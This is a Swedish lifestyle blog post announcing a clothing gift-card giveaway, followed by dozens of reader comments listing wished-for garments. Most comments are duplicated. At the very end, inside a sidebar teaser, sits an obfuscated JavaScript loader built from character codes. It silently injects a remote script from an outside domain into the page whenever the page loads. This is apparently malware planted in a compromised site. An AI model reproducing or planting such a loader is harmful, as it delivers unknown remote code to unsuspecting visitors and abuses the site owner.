TÄVLING! -Sugen på vårnytt till DIN garderob?

-Sugen på lite vårnyheter till garderoben?

Det är många mammor och småbarnsföräldrar här inne, glömmer du bort dig själv och bara handlar till barnen?

Ta chansen och Vinn ett presentkort hos STYLE LEVEL till ett värde utav 1000:- som du HELT får unna dig själv <3 

image

Hej Vännen!

Då ni visar ett galet stort engagemang genom att stötta mig, peppa mig, ge mig tips och råd genom min rehablitering så vill jag ju såklart GE er någonting tillbaka 🙂

Tävlingar tycker jag är roligt… -Tycker du? Ju fler vi är som tävlar, ju fler tävlingar kan jag erbjuda 🙂 Glöm inte,

-Tävlar man inte så vinner man inte 😉 Det enda du behöver göra för att vara med och tävla är att:

*DELA DETTA INLÄGGET PÅ DIN FACEBOOK SIDA

*KLICKA DIG IN PÅ DERAS SIDA —> —>  Style Level (för att välja ut din favorit/favoriter)

*LÄMNA EN KOMMENTAR MED ÖNSKEMÅL OM VILKET/VILKA PLAGG DU ÖNSKAR VINNA 🙂

Om det blir just DU som vinner så hinner du kika igenom webbshopen en gång till, men det är intressant att se vad som är just DIN favorit inne på deras webbshop! här får ni se några utav MINA favoriter nu när vi går mot vår och ljusare tider… 

image

image

-Klara färdiga, kör! In och tävla med dig nu!!! 😉 -STORT LYCKA TILL!

Med risk för att bli tjatig, jag måste bara ännu en gång få säga TACK! -Tack för att du bryr dig och för ditt otroliga engagemang…. Från hjärtat så är jag verkligen rörd <3 

kramar /En lite piggare My Martens idag 

ps all feedback kring bloggen är välkommet, vad vill du se mer/mindre utav? Har du frågor till mig, -just ask! 🙂

 

176 Komentarer

 1. Åh va roligt det skulle vara att vinna – NIKKIE COAT DUSTY BEIGE. Den är så snygg!! Kul med alla tävlingar My☺. Hoppas att du känner dig lite bättre idag!

 2. Önskar att vinna detta presentkort så jag kan köpa STYLE LEVEL – SIMPLY CHIC DESTROYED JEANS. Håller verkligen tummarna!!

 3. Och feedback!
  Tycker din blogg är kanon. Tycker du är personlig, intressant och kul i din blogg. Gillar att du blandar allt från företagande till blommor och allt där emellan. <3
  Och din blogg känns ärlig utan att bli too much och det är kul att få ta del av så mycket, inkl din operation. (Wow vilket mod, heja!!)
  Så just keep it up om du frågar mig! ?

 4. Åh vad roligt!!! Jag behöver verkligen en uppdatering i min garderob ? Vinner aldrig tävlingar….. :/ Typsikt!
  Jag hittade några olika favoriter
  – The black poncho
  – Zebra cardigan, cerise
  -Lace cardigan, vit eller svart
  – Bianca dress, strl S
  HOPPAS PÅ TUR ? Kraam!

 5. Hade velat vinna ”the black pants” födde barn för 8 månader sen & har 5 kg kvar till målvikten nu äntligen! Inga jeans passar mig längre, antingen är det för stort eller för slitet sedan innan graviditeten ?
  Hoppas hoppas ?

 6. Vilken härlig tävling!
  Efter att jag nu fött barn och snart ska genomgå en stor operation så vore det helt fantastiskt att få möta våren och gå en promenad med älskade dottern i ett par Nikkie Boots från Style Level!
  Hoppas att du snabbt återhämtat dig från operationen och får en fin vår! Tack för en riktigt bra blogg! Kram!

 7. Kul att läsa att du känner dig lite piggare.
  Tävlingar….alltid lika kul.
  Hittat min favorit, Nikkei Coat beige. En riktigt kvinnlig vårkappa att ha tillsammans med Ldir o ett par slitna jeans skulle vara super….
  Kram o ha en skön kväll

 8. Hej (: jag skulle vilja vinna STYLE LEVEL – JESSICA JUMPSUIT WHITE KAMPANJ eller ett par ROBIN HEELS. Snart är våren här förhoppningsvis ? och vad passar inte bättre än en fin jumpsuit eller ett par snygga heels ?

 9. Hej fina My!
  Vilken kämpe du är och sån grym inspiration du ger. Jag är en av dina läsare som inte kommenterar så ofta utan mest läser din vackra blogg men stor glädje.
  Om jag fick bli den lyckliga vinnaren av denna fantastiska tävling skulle jag vilja ha ett par robin heels skor. Som jag länge titta på men tyvärr inte har råd att köpa.
  stor kram och tack igen för en fin blogg
  Maria

 10. Hej My…
  Hittade dig via en vän som delade ett inlägg från din blogg och har sen dess följt dig på din resa. Ska på bröllop i sommar och behöver verkligen något snyggt. Fastnade för STYLE LEVEL – AVELINE DRESS LEO KAMPANJ Så hoppas verkligen på en stor chans att vinna så problemet löser sig. Krya på dig och ta det lungt.
  ❤️

 11. Åh va roligt det skulle vara att vinna – NIKKIE COAT DUSTY BEIGE. Den är så snygg!! Kul med alla tävlingar My☺. Hoppas att du känner dig lite bättre idag!

 12. Önskar att vinna detta presentkort så jag kan köpa STYLE LEVEL – SIMPLY CHIC DESTROYED JEANS. Håller verkligen tummarna!!

 13. Och feedback!
  Tycker din blogg är kanon. Tycker du är personlig, intressant och kul i din blogg. Gillar att du blandar allt från företagande till blommor och allt där emellan. <3
  Och din blogg känns ärlig utan att bli too much och det är kul att få ta del av så mycket, inkl din operation. (Wow vilket mod, heja!!)
  Så just keep it up om du frågar mig! 😉

 14. Åh vad roligt!!! Jag behöver verkligen en uppdatering i min garderob 🙂 Vinner aldrig tävlingar….. :/ Typsikt!

  Jag hittade några olika favoriter

  – The black poncho
  – Zebra cardigan, cerise
  -Lace cardigan, vit eller svart
  – Bianca dress, strl S

  HOPPAS PÅ TUR 😉 Kraam!

 15. Hade velat vinna ”the black pants” födde barn för 8 månader sen & har 5 kg kvar till målvikten nu äntligen! Inga jeans passar mig längre, antingen är det för stort eller för slitet sedan innan graviditeten 🙁
  Hoppas hoppas 😀

 16. Skulle helt klart unna mig den sagolika blusen STYLE LEVEL – JULIETTA BLOUSE WHITE! En härlig blus att verkligen matcha med ljuvliga sjalar såhär i vårspirande tider!

 17. En snygg jacka som denna skulle jag mer än gärna möta våren med! – STYLE LEVEL, SIGNATURE JACKET BLACK. Eller en nikki coat, solklart!
  Håller tummar & tår för lite medvind på tävlingen ☺️
  Tack för en toppen härlig & ärlig blogg!

 18. Åh va jag önskar att jag vinner..fanns så mycket snyggt! Fastnade för VILJA PANTS, men även THE VINTAGE JEANS, JULIETTA BLOUSE WHITE OCH VICTORIA BLOUSE
  Hoppas på vinst och önskar dig all lycka i din läkning och tack för en bra blogg!

 19. Vilken härlig tävling!
  Efter att jag nu fött barn och snart ska genomgå en stor operation så vore det helt fantastiskt att få möta våren och gå en promenad med älskade dottern i ett par Nikkie Boots från Style Level!
  Hoppas att du snabbt återhämtat dig från operationen och får en fin vår! Tack för en riktigt bra blogg! Kram!

 20. Alexia jacket har jag suktat efter men inte kunnat unna mig så jag håller tummar och tår för att jag får bli snygg i vår:)

 21. Hej My! Hittat hit från Maggans blogg nyss, blir inspirerad av dig och ditt ärliga sätt att skriva. Jo, jag skulle vilja fråga angående ditt hår, det är så fint! Hur får du till lockarna, har du extensions som har ”fasta” lockar? Det ser alltid fantastiskt fint ut, och jag gissar att du inte hade stått och lockat det direkt efter operationen osv ? Önskar mig sådant hår, tacksam för svar <3

 22. Kul att läsa att du känner dig lite piggare.
  Tävlingar….alltid lika kul.
  Hittat min favorit, Nikkei Coat beige. En riktigt kvinnlig vårkappa att ha tillsammans med Ldir o ett par slitna jeans skulle vara super….
  Kram o ha en skön kväll

 23. Hej (: jag skulle vilja vinna STYLE LEVEL – JESSICA JUMPSUIT WHITE KAMPANJ eller ett par ROBIN HEELS. Snart är våren här förhoppningsvis 🙂 och vad passar inte bättre än en fin jumpsuit eller ett par snygga heels 🙂

 24. Hej fina My!
  Vilken kämpe du är och sån grym inspiration du ger. Jag är en av dina läsare som inte kommenterar så ofta utan mest läser din vackra blogg men stor glädje.
  Om jag fick bli den lyckliga vinnaren av denna fantastiska tävling skulle jag vilja ha ett par robin heels skor. Som jag länge titta på men tyvärr inte har råd att köpa.
  stor kram och tack igen för en fin blogg
  Maria

 25. Hej My…

  Hittade dig via en vän som delade ett inlägg från din blogg och har sen dess följt dig på din resa. Ska på bröllop i sommar och behöver verkligen något snyggt. Fastnade för STYLE LEVEL – AVELINE DRESS LEO KAMPANJ Så hoppas verkligen på en stor chans att vinna så problemet löser sig. Krya på dig och ta det lungt.
  ❤️

 26. Skulle helt klart unna mig den sagolika blusen STYLE LEVEL – JULIETTA BLOUSE WHITE! En härlig blus att verkligen matcha med ljuvliga sjalar såhär i vårspirande tider!

 27. En snygg jacka som denna skulle jag mer än gärna möta våren med! – STYLE LEVEL, SIGNATURE JACKET BLACK. Eller en nikki coat, solklart!
  Håller tummar & tår för lite medvind på tävlingen ☺️
  Tack för en toppen härlig & ärlig blogg!

 28. Vad roligt med en tävling. Hade varit fantastiskt att få gå runt i STYLE LEVEL – THE BLACK PONCHO
  I vår med ett par snygga solglasögon ?
  Tack för en bra blogg

 29. Åh va jag önskar att jag vinner..fanns så mycket snyggt! Fastnade för VILJA PANTS, men även THE VINTAGE JEANS, JULIETTA BLOUSE WHITE OCH VICTORIA BLOUSE

  Hoppas på vinst och önskar dig all lycka i din läkning och tack för en bra blogg!

 30. Gillat och delat på Facebook.
  Jag tycker att jackan style level stella jacket white är fin, så hoppas att jag har tur och vinner.

 31. Hej!! Vad roligt med en tävling:) såg direkt att Nikki Coat skulle få en plats hemma hos mig. Men hitta självklart mycket mer tex:
  -THE JEANS JACKET (tuff och snygg)
  – DREAM NECKLACE NEON YELLOW (så snygg att matcha till en enkel toppe)
  -THE LACE JEANSSHORTS (snygga till sommaren)
  -THE WHITE ANGEL WING EARRINGS (snygga till en fest)
  -ROBIN HEELS (riktigt snygga nu till våren)
  Hoppas självklart man vinner!! Tack på förhand:)

 32. Alexia jacket har jag suktat efter men inte kunnat unna mig så jag håller tummar och tår för att jag får bli snygg i vår:)

 33. Hej My! Hittat hit från Maggans blogg nyss, blir inspirerad av dig och ditt ärliga sätt att skriva. Jo, jag skulle vilja fråga angående ditt hår, det är så fint! Hur får du till lockarna, har du extensions som har ”fasta” lockar? Det ser alltid fantastiskt fint ut, och jag gissar att du inte hade stått och lockat det direkt efter operationen osv 😉 Önskar mig sådant hår, tacksam för svar <3

 34. Delat på Facebook. Just nu höggravid och går mest omkring i tältliknande form på kläderna. Längtar efter min skatt- men även att få bära snygga kläder igen.
  STYLE LEVEL – STELLA JACKET BLACK – är given inför våren! Så himla läcker!

 35. Vilken toppentävling!
  Å vilken ärlig och fin blogg!
  STYLE LEVEL – NIKKIE COAT DUSTY BEIGE har jag suktat efter sen den kom.
  Kram

 36. Har delat här:
  https://www.facebook.com/Paola.C.Allegrini/posts/587802151353869?pnref=story
  Mina tonåringar och jag pratade härom dagen om vad vi lägger pengar på utan att få dåligt samvete, och jag kom inte på något. Jag får ju dåligt samvete för allt jag köper till mig själv. Fast så ska det väl ändå inte vara!! Men, men … precis som så många andra prioriterar jag barnen först. Därför skulle jag våga mig på denna läckerbit om jag hade turen på min sida!
  http://www.stylelevel.com/style-level-idisa-dress-short-sleeve-black-4

 37. Hej!
  Jag vill vinna för att överraska min lillasyster ♡
  Hon är kroniskt sjuk i en ovanlig genetisk bindvävssjukdom som vi alla i familjen har och hon är ensamstående mamma till en liten kille ♡
  Hon unnar sig inget själv men det tycker jag hon är värd så som hon får slita pga sjukdomen som bla ger instabila leder.
  Vet att hon suktat efter dom här jeansen:
  http://www.stylelevel.com/style-level-the-grey-jeans-4
  Så om hon fick möjlighet att köpa dom skulle hon jubla!
  Har delat på Facebook, Malin Svensk Björck.
  Ha en fin vecka!
  Mvh Malin

 38. Vad roligt med en tävling. Hade varit fantastiskt att få gå runt i STYLE LEVEL – THE BLACK PONCHO
  I vår med ett par snygga solglasögon 🙂
  Tack för en bra blogg

 39. Gillat och delat på Facebook.
  Jag tycker att jackan style level stella jacket white är fin, så hoppas att jag har tur och vinner.

 40. Fantastiskt o få följa din resa – är grymt imponerad av dig och rätt nybliven följare..Har själv som du vägt väldigt mkt o gått ner.. men pga mkt jobbiga händelser 2014 har de blivit lite mkt tröstäta, godis godis så gott.. .både min svärfar o mamma somnade in nu i december efter tids sjukdom (svärfar) mamma gick fort o totalt oväntat oh hon somnade in på juldagen – FRUKTANSVÄRT o förlora sin mamma…Usch va ont de gör <3<3<3
  Men fr Måndag har jag bestämt att jag måste ta mig neråt ca 15 kg – så stort mål o vill gärna ha lite delmål – få vinna tävligen o därmed unna mig något läckert till våren…
  Fastnade för STARLETT BAG WHITE/GOLD urläcker samt en scarf THE BUTTERFLY SCARF PINK och lite annat bla denna läckra jacka : SIGNATURE JACKET BLACK skulle nog shoppa lite mer än vinsten me… för de va mkt fint i den butiken som jag heller inte tittat på förut…
  Hoppfull hälsning fr mig – oh önskar dig stort lycka till med rehab

 41. Hej!! Vad roligt med en tävling:) såg direkt att Nikki Coat skulle få en plats hemma hos mig. Men hitta självklart mycket mer tex:
  -THE JEANS JACKET (tuff och snygg)
  – DREAM NECKLACE NEON YELLOW (så snygg att matcha till en enkel toppe)
  -THE LACE JEANSSHORTS (snygga till sommaren)
  -THE WHITE ANGEL WING EARRINGS (snygga till en fest)
  -ROBIN HEELS (riktigt snygga nu till våren)
  Hoppas självklart man vinner!! Tack på förhand:)

 42. Hej. Jag önskar att vinna vilket plagg/accessoar son helt pågrund av att jag känner för en förnyelse då mycket tid/ork aiata tiden gått åt till att försöka vara på jobbet, vabba och vara en god fru .

 43. Hej My! Hoppas du mår bättre om magen idag.
  Min favorit och önskan om att få vinna är Starlett bag white/gold, den skulle jag vilja ha till min brors bröllop som är i vår. Tror den blir väldigt fin till en långklänning.
  Med vänlig hälsning, Jessi

 44. Hej My!
  Det är exakt så som du skriver… Att man som småbarnsförälder ofta glömmer bort sig själv. Eller får prioritera bort. Därför skulle den här vinsten betyda jättemycket för mig.
  Svårt att välja någon favorit, då allt är så snyggt, men om jag vann skulle jag välja ALEXIA JACKET eller CLOE PANTS. Eller helt enkelt unna mig båda! ?
  Delar på Facebook och insta! (@marthinalundstrom)

 45. Delat på Facebook. Just nu höggravid och går mest omkring i tältliknande form på kläderna. Längtar efter min skatt- men även att få bära snygga kläder igen.
  STYLE LEVEL – STELLA JACKET BLACK – är given inför våren! Så himla läcker!

 46. Min favorit är en skinnjacka!
  Jag tävlar och hoppas att få vinna för vill att min mamma ska få köpa något fint för det förtjänar hon för hon är bäst!

 47. Hej! Du e en riktig kämpe! Roligt med tävlingar. Jag skulle vilja ha en celine klänning. Har svårt att hitta klänningar då min ”mage” lägger sig som en bula i de flesta! Dessa var så fint draperade så de skulle nog även få mig att känna mig fin för en gångs skull. Kämpa vidare! Kram ❤

 48. Vilken toppentävling!

  Å vilken ärlig och fin blogg!

  STYLE LEVEL – NIKKIE COAT DUSTY BEIGE har jag suktat efter sen den kom.

  Kram

 49. Har delat här:
  https://www.facebook.com/Paola.C.Allegrini/posts/587802151353869?pnref=story

  Mina tonåringar och jag pratade härom dagen om vad vi lägger pengar på utan att få dåligt samvete, och jag kom inte på något. Jag får ju dåligt samvete för allt jag köper till mig själv. Fast så ska det väl ändå inte vara!! Men, men … precis som så många andra prioriterar jag barnen först. Därför skulle jag våga mig på denna läckerbit om jag hade turen på min sida!
  https://www.stylelevel.com/style-level-idisa-dress-short-sleeve-black-4

 50. Hej!
  Jag vill vinna för att överraska min lillasyster ♡
  Hon är kroniskt sjuk i en ovanlig genetisk bindvävssjukdom som vi alla i familjen har och hon är ensamstående mamma till en liten kille ♡
  Hon unnar sig inget själv men det tycker jag hon är värd så som hon får slita pga sjukdomen som bla ger instabila leder.
  Vet att hon suktat efter dom här jeansen:
  https://www.stylelevel.com/style-level-the-grey-jeans-4

  Så om hon fick möjlighet att köpa dom skulle hon jubla!
  Har delat på Facebook, Malin Svensk Björck.
  Ha en fin vecka!
  Mvh Malin

 51. Fantastiskt o få följa din resa – är grymt imponerad av dig och rätt nybliven följare..Har själv som du vägt väldigt mkt o gått ner.. men pga mkt jobbiga händelser 2014 har de blivit lite mkt tröstäta, godis godis så gott.. .både min svärfar o mamma somnade in nu i december efter tids sjukdom (svärfar) mamma gick fort o totalt oväntat oh hon somnade in på juldagen – FRUKTANSVÄRT o förlora sin mamma…Usch va ont de gör <3<3<3
  Men fr Måndag har jag bestämt att jag måste ta mig neråt ca 15 kg – så stort mål o vill gärna ha lite delmål – få vinna tävligen o därmed unna mig något läckert till våren…

  Fastnade för STARLETT BAG WHITE/GOLD urläcker samt en scarf THE BUTTERFLY SCARF PINK och lite annat bla denna läckra jacka : SIGNATURE JACKET BLACK skulle nog shoppa lite mer än vinsten me… för de va mkt fint i den butiken som jag heller inte tittat på förut…
  Hoppfull hälsning fr mig – oh önskar dig stort lycka till med rehab

 52. Vilken nice tävling !!
  THE STYLE LEVEL – THE BLACK PANTS sitter jag
  och suktar efter – så snygga och så dyra för mig
  som studerar. En riktig drömvinst ?
  Delar din tävling på min FB sida och hoppas innerligt på
  turen !!

 53. Hej. Jag önskar att vinna vilket plagg/accessoar son helt pågrund av att jag känner för en förnyelse då mycket tid/ork aiata tiden gått åt till att försöka vara på jobbet, vabba och vara en god fru .

 54. Hej My! Hoppas du mår bättre om magen idag.
  Min favorit och önskan om att få vinna är Starlett bag white/gold, den skulle jag vilja ha till min brors bröllop som är i vår. Tror den blir väldigt fin till en långklänning.

  Med vänlig hälsning, Jessi

 55. Hej My!
  Det är exakt så som du skriver… Att man som småbarnsförälder ofta glömmer bort sig själv. Eller får prioritera bort. Därför skulle den här vinsten betyda jättemycket för mig.
  Svårt att välja någon favorit, då allt är så snyggt, men om jag vann skulle jag välja ALEXIA JACKET eller CLOE PANTS. Eller helt enkelt unna mig båda! 😉
  Delar på Facebook och insta! (@marthinalundstrom)

 56. Min favorit är en skinnjacka!
  Jag tävlar och hoppas att få vinna för vill att min mamma ska få köpa något fint för det förtjänar hon för hon är bäst!

 57. Hej! Du e en riktig kämpe! Roligt med tävlingar. Jag skulle vilja ha en celine klänning. Har svårt att hitta klänningar då min ”mage” lägger sig som en bula i de flesta! Dessa var så fint draperade så de skulle nog även få mig att känna mig fin för en gångs skull. Kämpa vidare! Kram ❤

 58. Engla dress! Tänk att få gå på fest i en sån klänning! Jag har nog inte ens köpt en klänning sen jag fick mina barn. Vore så underbart att få hänga in en sån BEAUTY i garderoben och drömma om härliga sommarnätter som komma skall ?

 59. Hej My! Älskar din blogg och tycker du är en fantastisk människa ?, tävlar och får hoppas på att vinna haha..jag tyckte The Black poncho och Nicci Coat dusty beige var jätte fina. Hoppas du mår bättre nu. Kram

 60. Vilken nice tävling !!
  THE STYLE LEVEL – THE BLACK PANTS sitter jag
  och suktar efter – så snygga och så dyra för mig
  som studerar. En riktig drömvinst 🙂
  Delar din tävling på min FB sida och hoppas innerligt på
  turen !!

 61. Har delat på FB. Black poncho eller Lova pants skulle göra sig på den här fyrabarnsmamman som är riktigt dålig på att unna sig själv något läckert ?. Krya på dig och GRYMT kämpat med att sluta röka! Kram.

 62. Engla dress! Tänk att få gå på fest i en sån klänning! Jag har nog inte ens köpt en klänning sen jag fick mina barn. Vore så underbart att få hänga in en sån BEAUTY i garderoben och drömma om härliga sommarnätter som komma skall 🙂

 63. Hej My! Älskar din blogg och tycker du är en fantastisk människa :D, tävlar och får hoppas på att vinna haha..jag tyckte The Black poncho och Nicci Coat dusty beige var jätte fina. Hoppas du mår bättre nu. Kram

 64. Har delat på FB. Black poncho eller Lova pants skulle göra sig på den här fyrabarnsmamman som är riktigt dålig på att unna sig själv något läckert :). Krya på dig och GRYMT kämpat med att sluta röka! Kram.

 65. Jag föll pladask för the black pants! Födde tvillingar för drygt ett år sedan och gick upp alldeles för många kilon, nu är dessa ett minne blott ? Tyvärr sitter inga gamla brallor bra så hoppas på tur att vinna ett par kick ass snygga att glida runt i.

 66. Jag föll pladask för the black pants! Födde tvillingar för drygt ett år sedan och gick upp alldeles för många kilon, nu är dessa ett minne blott 🙂 Tyvärr sitter inga gamla brallor bra så hoppas på tur att vinna ett par kick ass snygga att glida runt i.

 67. My my my bästa bloggare!
  Jag är en kvinna i mina bästa 51 år! Har 5 underbara barn! 4 pojkar varav 2st tvilling
  killar samt en tjej! Min yngsta som är en tjej är 15 år och helt underbar! Alltid glad och Älskar att spela fotboll o innebandy! Det är just till min Dotter som eventuellt vinsten går till!
  Om jag/vi vinner så önskar vi
  ALEXIA JACKET såååååå snygg!
  Tack o krya på dig! Gjorde samma op efter mitt 5’e o sista barn. Aldrig ångrat mig!
  Kram Pia

 68. My my my bästa bloggare!

  Jag är en kvinna i mina bästa 51 år! Har 5 underbara barn! 4 pojkar varav 2st tvilling
  killar samt en tjej! Min yngsta som är en tjej är 15 år och helt underbar! Alltid glad och Älskar att spela fotboll o innebandy! Det är just till min Dotter som eventuellt vinsten går till!
  Om jag/vi vinner så önskar vi
  ALEXIA JACKET såååååå snygg!
  Tack o krya på dig! Gjorde samma op efter mitt 5’e o sista barn. Aldrig ångrat mig!
  Kram Pia

 69. Nicki Coat var ju superfin!som ensamstående mamma finns det inte så mycket utrymme ekonomiskt att handla så mycket till sig själv. Så det skulle va otroligt kul att vinna!! Håller mina tummar. Kram / Linda

 70. Nicki Coat var ju superfin!som ensamstående mamma finns det inte så mycket utrymme ekonomiskt att handla så mycket till sig själv. Så det skulle va otroligt kul att vinna!! Håller mina tummar. Kram / Linda

 71. Jag har gillat, delat under namnet De Markey på Facebook och Demarkey.se på Facebook, båda är mina konton.
  Jag skulle vilja vinna en ny garderob för att jag håller på att gå ner mina 35 gravidkilon och kommer inte ha något alls till våren eller sommaren, att ha på mig. Behöver skor, byxor, tröjor, kappa och gärna smycken ska shoppas. Så please give me a new closet ?
  /Diana

 72. Jag har gillat, delat under namnet De Markey på Facebook och Demarkey.se på Facebook, båda är mina konton.

  Jag skulle vilja vinna en ny garderob för att jag håller på att gå ner mina 35 gravidkilon och kommer inte ha något alls till våren eller sommaren, att ha på mig. Behöver skor, byxor, tröjor, kappa och gärna smycken ska shoppas. Så please give me a new closet 🙂

  /Diana

 73. Åh gud vad jag älskar tävlingar! Så himla härligt att du delar med dig av så mycket ? Verkligen fantastiskt allt du skriver och visar omvärlden. Många delar annars med sig av sitt liv på rosa moln.
  Om jag har turen på min sida så är mina favoriter ett par Robin Hells stövletter eller ett par chloe pants aw14.
  Kram /Sofia

 74. Hejsan My! Hoppas att du mår bättre! Har delat detta inlägg och det jag skulle vilja är The Monaco Bag(svart vit) lätt den snyggaste coolaste väskan jag sett på länge! Letat efter nån ny snygg väska! Denna skulle sitta perfekt! Men såg även en snygg poncho som hette wild poncho grey, grymt snygg! Och ett snyggt linne såg jag med, Sophia Top Svart.
  Ha en fin dag! Kram

 75. Åh gud vad jag älskar tävlingar! Så himla härligt att du delar med dig av så mycket 🙂 Verkligen fantastiskt allt du skriver och visar omvärlden. Många delar annars med sig av sitt liv på rosa moln.

  Om jag har turen på min sida så är mina favoriter ett par Robin Hells stövletter eller ett par chloe pants aw14.

  Kram /Sofia

 76. Hejsan My! Hoppas att du mår bättre! Har delat detta inlägg och det jag skulle vilja är The Monaco Bag(svart vit) lätt den snyggaste coolaste väskan jag sett på länge! Letat efter nån ny snygg väska! Denna skulle sitta perfekt! Men såg även en snygg poncho som hette wild poncho grey, grymt snygg! Och ett snyggt linne såg jag med, Sophia Top Svart.
  Ha en fin dag! Kram

 77. Jag som tävlar och tävlar men aldrig vinner har nästan gett upp att vara med i tävlingar. Men jag älskar din blogg och när jag såg denna tävling var jag bara tvungen att vara med i den. Har kollat in Robin heels hur länge som helst men kände att de var svårt att beställa hem dem till USA. Men nu äntligen flyttar jag hem till Sverige igen i vår och då hade Robin heels passat perfekt. Jag håller alla tummar och tår och hoppas att just jag vinner.
  Kul att du berättar så öppna saker och delar med dig till oss läsare. Det uppslattas jättemycket. Krya på dig! ? ♡

 78. Jag som tävlar och tävlar men aldrig vinner har nästan gett upp att vara med i tävlingar. Men jag älskar din blogg och när jag såg denna tävling var jag bara tvungen att vara med i den. Har kollat in Robin heels hur länge som helst men kände att de var svårt att beställa hem dem till USA. Men nu äntligen flyttar jag hem till Sverige igen i vår och då hade Robin heels passat perfekt. Jag håller alla tummar och tår och hoppas att just jag vinner.
  Kul att du berättar så öppna saker och delar med dig till oss läsare. Det uppslattas jättemycket. Krya på dig! 🙂 ♡

 79. Hej!
  Vilken bra blogg, så mycket fint att titta på!
  Om jag vinner vill jag SÅÅ gärna ha The Hippie Summer Jeans och Michaela Blouse!
  //Jessica

 80. Hej!

  Vilken bra blogg, så mycket fint att titta på!
  Om jag vinner vill jag SÅÅ gärna ha The Hippie Summer Jeans och Michaela Blouse!

  //Jessica

 81. Jag vill jättegärna vara med! Jag studerar, och är ensamstående med mina barn, så ekonomin är verkligen stram, och det är sällan att man har råd att unna sig något extra! Jg ska dessutom I praktik snart, dessa kläder skulle passa bra både till vardags och fest och kunna ta mig direkt från kontoret till affärs möten genom att bara byta skor och accessories! Perfekt ju hoppas på tur! http://www.stylelevel.com/style-level-the-aveline-dress-leo-6 och http://www.stylelevel.com/style-level-the-aveline-dress-lilac och http://www.stylelevel.com/style-level-the-wite-angel-wing-earrings och http://www.stylelevel.com/style-level-red-diamonds-earrings ? Jag har delat: https://www.facebook.com/jenniearmstrongJA/posts/864874943572420

 82. Jag vill jättegärna vara med! Jag studerar, och är ensamstående med mina barn, så ekonomin är verkligen stram, och det är sällan att man har råd att unna sig något extra! Jg ska dessutom I praktik snart, dessa kläder skulle passa bra både till vardags och fest och kunna ta mig direkt från kontoret till affärs möten genom att bara byta skor och accessories! Perfekt ju hoppas på tur! https://www.stylelevel.com/style-level-the-aveline-dress-leo-6 och https://www.stylelevel.com/style-level-the-aveline-dress-lilac och https://www.stylelevel.com/style-level-the-wite-angel-wing-earrings och https://www.stylelevel.com/style-level-red-diamonds-earrings 🙂 Jag har delat: https://www.facebook.com/jenniearmstrongJA/posts/864874943572420

 83. Vill ha! Vill vinna. Väskan ”The berlin bag nude” Skulle passa himla underbart nu till våren. Unnar mig – aldrig – sånt här fint och lite dyrare. Vill verkligen få vinna en gång nu.
  Kram

 84. Vill ha! Vill vinna. Väskan ”The berlin bag nude” Skulle passa himla underbart nu till våren. Unnar mig – aldrig – sånt här fint och lite dyrare. Vill verkligen få vinna en gång nu.
  Kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/